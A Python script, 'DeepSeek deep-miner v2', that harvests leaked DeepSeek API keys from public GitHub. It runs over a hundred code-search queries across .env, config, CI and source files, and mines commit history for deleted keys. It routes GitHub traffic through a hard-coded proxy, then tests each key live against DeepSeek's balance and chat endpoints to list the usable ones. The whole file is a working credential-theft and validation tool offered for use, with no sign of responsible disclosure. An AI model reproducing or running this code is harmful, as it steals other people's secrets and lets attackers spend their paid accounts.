#!/usr/bin/env python3 """DeepSeek deep-miner v2. Over v1: - Far broader search queries (more languages, file types, env-var spellings, base_url / openai-compat patterns, k8s/docker/CI, Chinese terms, READMEs). - Optional per-file commit-history scan (Stage 2c) to recover keys deleted in prior commits, bounded per file. Uses the core API (--max-commits). - Incremental candidate/key checkpoints so a killed run resumes. Classification: only HTTP 401 => DEAD. Verify order balance -> chat -> reasoner. Outputs results/deepseek_v2/. """ import argparse, json, os, re, subprocess, sys, time import urllib.request, urllib.error, urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent)) from verify_cache import CachedVerifier from content_cache import ContentCache, parse_raw_url HERE = Path(__file__).parent RESULTS_DIR = HERE / "results" / "deepseek_v2" RESULTS_DIR.mkdir(parents=True, exist_ok=True) EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt" CANDIDATES_FILE = RESULTS_DIR / "candidates.txt" GLOBAL_EXTRACTED = HERE / "results" / "extracted_keys.txt" UA = "curl/8.5.0" BASE = "https://api.deepseek.com" GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389") _gh_opener = None def gh_opener(): global _gh_opener if _gh_opener is None: if GH_PROXY: h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}) _gh_opener = urllib.request.build_opener(h) else: _gh_opener = urllib.request.build_opener() return _gh_opener _direct_opener = None def direct_opener(): global _direct_opener if _direct_opener is None: _direct_opener = urllib.request.build_opener(urllib.request.ProxyHandler({})) return _direct_opener KEY_RE = re.compile(r"sk-[a-f0-9]{32}") BLACKLIST = ( "00000000000000000000000000000000","1234567890abcdef1234567890abcdef", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx","your-","example","placeholder","test-key", ) # Direct (no proxy) for DeepSeek verification; proxy for GitHub. def http_request(method, path, key, body=None, timeout=30): url = f"{BASE}{path}" h = {"User-Agent": UA, "Accept": "*/*", "Authorization": f"Bearer {key}"} data = None if body is not None: data = json.dumps(body).encode(); h["Content-Type"] = "application/json" req = urllib.request.Request(url, data=data, headers=h, method=method) try: with direct_opener().open(req, timeout=timeout) as resp: return resp.getcode(), resp.read().decode("utf-8","replace") except urllib.error.HTTPError as e: try: return e.code, e.read().decode("utf-8","replace") except Exception: return e.code, "" except Exception as e: return 0, f"network: {type(e).__name__}: {e}" def classify_balance(code, body): if code == 200: try: d = json.loads(body); bal = d.get("balance_infos") or [] if bal: total = 0.0 for b in bal: try: total += float(b.get("total_balance",0)) except (TypeError,ValueError): pass if total > 0: return "USABLE", f"balance: \u00a5{total:.4f} {bal[0].get('currency','')}" return "NO_BALANCE","balance: 0" if d.get("is_available") is True: return "USABLE","balance: available" if d.get("is_available") is False: return "NO_BALANCE","balance: unavailable" return "USABLE", f"balance: {body[:120]}" except json.JSONDecodeError: return "USABLE", f"balance: {body[:120]}" if code in (402,429): return "NO_BALANCE", f"bal HTTP {code}: {body[:140]}" if code == 401: return "DEAD","401 unauthorized" if code == 0: return "UNKNOWN", body[:160] return "NO_ACCESS", f"bal HTTP {code}: {body[:140]}" def classify_chat(code, body): bl = (body or "").lower() if code == 200: if '"choices"' in bl or '"id"' in bl: return "USABLE","chat 200 OK" if any(x in bl for x in ("balance","quota","arrearage","insufficient")): return "NO_BALANCE", f"chat: {body[:120]}" return "USABLE", f"chat: {body[:120]}" if code in (402,429): return "NO_BALANCE", f"chat HTTP {code}: {body[:140]}" if code == 401: return "DEAD","chat 401" if code == 0: return "UNKNOWN", body[:160] return "NO_ACCESS", f"chat HTTP {code}: {body[:140]}" RANK = {"USABLE":4,"NO_BALANCE":3,"NO_ACCESS":2,"UNKNOWN":1,"DEAD":0} def verify_key(key): best, best_detail = "DEAD", "" code, body = http_request("GET","/user/balance",key) v,d = classify_balance(code,body) if RANK[v] > RANK[best]: best,best_detail = v,d if best == "USABLE": return best,best_detail for model in ("deepseek-chat","deepseek-reasoner"): code,body = http_request("POST","/v1/chat/completions",key,body={ "model":model,"messages":[{"role":"user","content":"hi"}],"max_tokens":1}) v,d = classify_chat(code,body); d = f"[{model}] {d}" if RANK[v] > RANK[best]: best,best_detail = v,d if best == "USABLE": return best,best_detail return best,best_detail def valid_key(k): if not KEY_RE.fullmatch(k): return False low = k.lower() return not any(b in low for b in BLACKLIST) SEARCH_QUERIES = [ # env-var spellings '"DEEPSEEK_API_KEY" extension:env', '"DEEPSEEK_KEY" extension:env', '"DEEPSEEK_TOKEN" extension:env', '"DEEPSEEK_API_KEY" filename:.env', '"DEEPSEEK_API_KEY" extension:env.example', '"DEEPSEEK_API_KEY" extension:env.local', # config files by extension '"DEEPSEEK_API_KEY" extension:yaml', '"DEEPSEEK_API_KEY" extension:yml', '"DEEPSEEK_API_KEY" extension:json', '"DEEPSEEK_API_KEY" extension:toml', '"DEEPSEEK_API_KEY" extension:ini', '"DEEPSEEK_API_KEY" extension:cfg', '"DEEPSEEK_API_KEY" extension:conf', '"DEEPSEEK_API_KEY" extension:properties', '"DEEPSEEK_API_KEY" extension:env', # more languages '"DEEPSEEK_API_KEY" extension:py', '"DEEPSEEK_API_KEY" extension:ipynb', '"DEEPSEEK_API_KEY" extension:js', '"DEEPSEEK_API_KEY" extension:ts', '"DEEPSEEK_API_KEY" extension:go', '"DEEPSEEK_API_KEY" extension:java', '"DEEPSEEK_API_KEY" extension:kt', '"DEEPSEEK_API_KEY" extension:rb', '"DEEPSEEK_API_KEY" extension:php', '"DEEPSEEK_API_KEY" extension:cs', '"DEEPSEEK_API_KEY" extension:rs', '"DEEPSEEK_API_KEY" extension:swift', '"DEEPSEEK_API_KEY" extension:dart', '"DEEPSEEK_API_KEY" extension:ex', '"DEEPSEEK_API_KEY" extension:exs', '"DEEPSEEK_API_KEY" extension:scala', '"DEEPSEEK_API_KEY" extension:sh', # api.deepseek.com in code '"api.deepseek.com" extension:py', '"api.deepseek.com" extension:js', '"api.deepseek.com" extension:ts', '"api.deepseek.com" extension:go', '"api.deepseek.com" extension:java', '"api.deepseek.com" extension:php', '"api.deepseek.com" extension:rb', '"api.deepseek.com" extension:cs', '"api.deepseek.com" extension:rs', '"api.deepseek.com" extension:json', '"api.deepseek.com" extension:yaml', '"api.deepseek.com" extension:yml', '"api.deepseek.com/v1"', '"api.deepseek.com/v1/chat/completions"', '"api.deepseek.com" bearer sk-', '"https://api.deepseek.com" "sk-"', # model strings with keys '"deepseek-chat" "sk-"', '"deepseek-reasoner" "sk-"', '"deepseek-chat" "api_key"', '"deepseek-reasoner" "api_key"', '"deepseek-chat" Authorization: Bearer sk-', '"deepseek-reasoner" Authorization: Bearer sk-', # direct assignment 'DEEPSEEK_API_KEY=sk-', 'DEEPSEEK_KEY=sk-', 'DEEPSEEK_TOKEN=sk-', 'deepseek_api_key=sk-', 'DeepSeek_API_KEY=sk-', 'deepseekToken=sk-', 'deepseek_api_secret=sk-', 'DEEPSEEK_API_SECRET=sk-', # openai-compat / base_url '"base_url" "api.deepseek.com" extension:py', '"base_url" "https://api.deepseek.com"', '"base_url" "api.deepseek.com" extension:js', '"api.deepseek.com" "OPENAI_API_KEY"', '"api.deepseek.com" filename:.env', 'deepseek "base_url" filename:.env', # config filenames 'deepseek "sk-" filename:config.json', 'deepseek "sk-" filename:config.toml', 'deepseek "sk-" filename:config.yaml', 'deepseek "sk-" filename:config.yml', 'deepseek "sk-" filename:config.py', 'deepseek "sk-" filename:settings.py', 'deepseek "sk-" filename:local.settings.json', 'deepseek "sk-" filename:application.yml', 'deepseek "sk-" filename:application.properties', 'deepseek "sk-" filename:secrets.yaml', 'deepseek "sk-" filename:secrets.yml', # docker / k8s / CI '"DEEPSEEK_API_KEY" filename:docker-compose', '"DEEPSEEK_API_KEY" filename:Dockerfile', '"DEEPSEEK_API_KEY" path:.github', '"DEEPSEEK_API_KEY" path:.gitlab', '"DEEPSEEK_API_KEY" filename:.gitlab-ci', '"api.deepseek.com" filename:values.yaml', '"api.deepseek.com" filename:deployment.yaml', '"api.deepseek.com" filename:configmap', # generic .env with deepseek 'deepseek "sk-" filename:.env', 'deepseek-chat filename:.env', 'deepseek-reasoner filename:.env', '"deepseek/v1" filename:.env', # SDK / client init 'DeepSeek(api_key=sk-', 'OpenAI(api_key=sk- "api.deepseek.com"', 'deepseek.DeepSeek sk-', 'new DeepSeek sk-', # Chinese terms / docs / README '"deepseek" "sk-" extension:md', '"deepseek" "api_key" extension:md', 'deepseek "sk-" filename:README', '"DEEPSEEK_API_KEY" filename:README', 'deepseek "\u7834\u89e3" sk-', 'deepseek "\u514d\u8d39" sk-', # proxy/gateway projects that embed upstream keys '"DEEPSEEK_API_KEY" filename:docker-compose.yml', '"deepseek" "sk-" filename:docker-compose', '"deepseek" "sk-" filename:.env.example', # one-api / new-api style channel configs '"deepseek" "sk-" filename:渠道', '"deepseek" "key" filename:channels', # broader bare key near deepseek 'deepseek sk-[a-f0-9]', '"sk-" "deepseek-chat" extension:py', ] def github_token(): tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN") if tok: return tok try: out = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10) if out.returncode == 0: return out.stdout.strip() except FileNotFoundError: pass hosts = Path.home()/".config"/"gh"/"hosts.yml" if hosts.exists(): for line in hosts.read_text().splitlines(): line=line.strip() if line.startswith("oauth_token:"): return line.split(":",1)[1].strip() return None def gh_api(url, token, wants_json=True): headers = {"Accept":"application/vnd.github+json","User-Agent":"key-hunter"} if token: headers["Authorization"]=f"Bearer {token}" req = urllib.request.Request(url, headers=headers) for attempt in range(6): try: with gh_opener().open(req, timeout=30) as resp: raw = resp.read() return json.loads(raw) if wants_json else raw except urllib.error.HTTPError as e: if e.code in (403,429): reset = e.headers.get("X-RateLimit-Reset") wait = max(int(reset)-int(time.time()),5) if reset else 30 print(f" rate-limited, waiting {wait}s...", file=sys.stderr) time.sleep(wait+1); continue if e.code == 422: return None e.read() return None except Exception as e: print(f" network: {e}", file=sys.stderr); time.sleep(3) return None def gh_search(query, token, per_page=100, max_pages=10): for page in range(1, max_pages+1): url = ("https://api.github.com/search/code" f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}") data = gh_api(url, token) if not data: return items = data.get("items",[]) if not items: return for it in items: yield it if len(items) < per_page: return time.sleep(2.2 if token else 7) def to_raw_url(html_url): return html_url.replace("github.com","raw.githubusercontent.com").replace("/blob/","/") def split_html_url(html_url): # https://github.com/owner/repo/blob/sha/path try: m = re.match(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)", html_url) if m: return m.group(1), m.group(2), m.group(3) except Exception: pass return None,None,None def fetch_raw(url): req = urllib.request.Request(url, headers={"User-Agent":"Mozilla/5.0"}) try: with gh_opener().open(req, timeout=20) as resp: return resp.read().decode("utf-8","replace") except Exception: return "" def make_cached_fetch(cc, fetcher=fetch_raw): """fetch_raw replacement served by ContentCache (immutable blob SHA).""" def cached(url): repo, sha, path = parse_raw_url(url) if repo and sha and path: txt = cc.get(repo, path, sha) if txt is not None: return txt txt = fetcher(url) if txt: cc.put(repo, path, sha, txt) return txt return fetcher(url) return cached def list_file_commits(repo, path, token, max_commits=3): """List commit SHAs touching a file (core API, 1 per page*path). Bounded.""" shas = [] url = ("https://api.github.com/repos/"+repo+"/commits" f"?path={urllib.parse.quote(path)}&per_page={max_commits}") data = gh_api(url, token) if not data: return shas for c in data: try: shas.append(c["sha"]) except Exception: pass return shas def fetch_commit_file(repo, sha, path, token): """Fetch file content at a given commit via raw.githubusercontent.""" url = f"https://raw.githubusercontent.com/{repo}/{sha}/{path}" return fetch_raw(url) def extract_keys(text, keys, src): n = 0 for k in KEY_RE.findall(text or ""): if valid_key(k) and k not in keys: keys[k] = src; n += 1 return n def main(): ap = argparse.ArgumentParser() ap.add_argument("--verify-only", action="store_true") ap.add_argument("--workers", type=int, default=20) ap.add_argument("--commit-workers", type=int, default=10) ap.add_argument("--max-commits", type=int, default=0, help="per-file commit history depth (0 disables Stage 2c)") ap.add_argument("--limit", type=int, default=0) ap.add_argument("--no-cache", action="store_true", help="ignore verification cache") ap.add_argument("--no-content-cache", action="store_true", help="ignore raw file content cache (always re-crawl)") ap.add_argument("--resume-search", action="store_true", help="load candidate files from candidates.txt checkpoint") args = ap.parse_args() keys = {} if GLOBAL_EXTRACTED.exists(): for line in GLOBAL_EXTRACTED.read_text().splitlines(): if not line.startswith("DeepSeek|"): continue parts = line.split("|",3) if len(parts) >= 3 and valid_key(parts[1]): keys[parts[1]] = parts[2] # also merge v1 extracted v1 = HERE/"results"/"deepseek_deep"/"extracted_keys.txt" if v1.exists(): for line in v1.read_text().splitlines(): p = line.split("|",1) if p and valid_key(p[0]): keys.setdefault(p[0], p[1] if len(p)>1 else "v1") print(f"loaded {len(keys)} previously-known DeepSeek keys") candidates = {} if args.resume_search and CANDIDATES_FILE.exists(): for line in CANDIDATES_FILE.read_text().splitlines(): if "|" in line: u,r = line.split("|",1); candidates[u]=r print(f"resumed {len(candidates)} candidates from checkpoint") if not args.verify_only: token = github_token() print(f"GitHub token: {'yes' if token else 'NO'}\n") print("=== Stage 1: code search ===") for i,q in enumerate(SEARCH_QUERIES,1): print(f" [{i:3d}/{len(SEARCH_QUERIES)}] {q}") try: for it in gh_search(q, token): u = it.get("html_url","") if u and u not in candidates: candidates[u] = it.get("repository",{}).get("full_name","?") except Exception as e: print(f" error: {e}", file=sys.stderr) if i % 10 == 0: with open(CANDIDATES_FILE,"w") as f: for u,r in candidates.items(): f.write(f"{u}|{r}\n") with open(CANDIDATES_FILE,"w") as f: for u,r in candidates.items(): f.write(f"{u}|{r}\n") print(f" candidate files: {len(candidates)}") print("\n=== Stage 2a: fetch HEAD raw & extract ===") fetched=new=0 with ContentCache(force=getattr(args,"no_content_cache",False)) as cc: cfetch = make_cached_fetch(cc) with ThreadPoolExecutor(max_workers=20) as pool: futs = {pool.submit(cfetch, to_raw_url(u)): u for u in candidates} for fut in as_completed(futs): u=futs[fut]; fetched+=1 try: content=fut.result() except Exception: content="" new += extract_keys(content, keys, u) if fetched % 200 == 0: print(f" {fetched}/{len(candidates)} keys={len(keys)} new={new} " f"cache={cc.hits}hit/{cc.misses}fetch") with open(EXTRACTED_FILE,"w") as f: for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n") st=cc.stats() print(f" content cache: {st['hits']} hits, {st['misses']} fetched " f"({st['bytes_served']} bytes from cache)") print(f" after HEAD: {len(keys)} keys ({new} new)") if args.max_commits > 0 and token: print(f"\n=== Stage 2c: per-file commit history (depth {args.max_commits}) ===") repo_paths = {} for u in candidates: repo,sha,path = split_html_url(u) if repo and path: repo_paths.setdefault(repo,set()).add(path) tasks = [] for repo, paths in repo_paths.items(): for path in paths: tasks.append((repo,path)) print(f" {len(tasks)} (repo,path) pairs across {len(repo_paths)} repos") done=0 with ContentCache(force=getattr(args,"no_content_cache",False)) as cc: cfetch = make_cached_fetch(cc) def job(rp): repo,path = rp shas = list_file_commits(repo,path,token,args.max_commits) found=[] for sha in shas: txt = cfetch(f"https://raw.githubusercontent.com/{repo}/{sha}/{path}") for k in KEY_RE.findall(txt or ""): if valid_key(k): found.append((k,f"https://github.com/{repo}/blob/{sha}/{path}")) return found with ThreadPoolExecutor(max_workers=args.commit_workers) as pool: futs={pool.submit(job,t):t for t in tasks} for fut in as_completed(futs): done+=1 try: for k,src in fut.result(): if k not in keys: keys[k]=src; new+=1 except Exception: pass if done % 100 == 0: print(f" {done}/{len(tasks)} keys={len(keys)} new={new} " f"cache={cc.hits}hit/{cc.misses}fetch") with open(EXTRACTED_FILE,"w") as f: for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n") st=cc.stats() print(f" commit content cache: {st['hits']} hits, {st['misses']} fetched") print(f" after commits: {len(keys)} keys") with open(EXTRACTED_FILE,"w") as f: for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n") if args.limit>0: keys=dict(list(keys.items())[:args.limit]) print(f" (limited to {args.limit})") print(f"\n=== Stage 3: verify {len(keys)} keys (workers={args.workers}) ===") buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]} processed=0; start=time.time() with CachedVerifier("deepseek", verify_key, force=args.no_cache) as ver: with ThreadPoolExecutor(max_workers=args.workers) as pool: futs={pool.submit(ver,k):(k,s) for k,s in keys.items()} for fut in as_completed(futs): k,s=futs[fut]; processed+=1 try: v,d=fut.result() except Exception as e: v,d="UNKNOWN",f"exc: {e}" buckets[v].append((k,s,d)) if processed%100==0: el=time.time()-start print(f" [{processed:5d}/{len(keys)}] use={len(buckets['USABLE'])} " f"nobal={len(buckets['NO_BALANCE'])} noacc={len(buckets['NO_ACCESS'])} " f"unk={len(buckets['UNKNOWN'])} dead={len(buckets['DEAD'])} ({processed/el:.1f}/s)") print(f" cache: {ver.stats()['hits']} hits, {ver.stats()['live']} live queries") el=time.time()-start; print(f"\nDone in {el:.1f}s") for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN","DEAD"): p=RESULTS_DIR/f"{name.lower()}.txt" with open(p,"w") as f: for k,s,d in sorted(buckets[name]): f.write(f"{k}|{s}|{d}\n") print(f" {name:11s}: {len(buckets[name]):5d} -> {p.name}") with open(RESULTS_DIR/"all_non_401.txt","w") as f: for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"): for k,s,d in sorted(buckets[name]): f.write(f"{name}|{k}|{s}|{d}\n") if buckets["USABLE"]: print("\n=== USABLE KEYS ===") for k,s,d in sorted(buckets["USABLE"]): print(f" {k}\n src: {s}\n {d}") if __name__ == "__main__": main()